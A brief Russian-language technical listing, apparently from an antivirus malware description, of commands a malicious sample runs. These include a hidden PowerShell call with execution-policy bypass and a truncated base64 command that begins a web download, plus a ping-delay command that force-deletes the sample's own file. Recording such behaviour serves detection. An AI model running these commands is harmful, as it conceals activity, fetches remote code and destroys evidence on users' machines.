Техническая информация
- nul
- '<SYSTEM32>\cmd.exe' /c powershell -v 4 -w hidden -executio bypass -NoPrO -enCod JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaQBuAHMANAA1ADEALgBsAG8AZwAnADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0A...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -v 4 -w hidden -executio bypass -NoPrO -enCod JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAaQBuAHMANAA1ADEALgBsAG8AZwAnADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJwBoAHQAdAB...
- '<SYSTEM32>\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1111 > Nul & Del /f /q "<Полный путь к файлу>"
- '<SYSTEM32>\ping.exe' 1.1.1.1 -n 1 -w 1111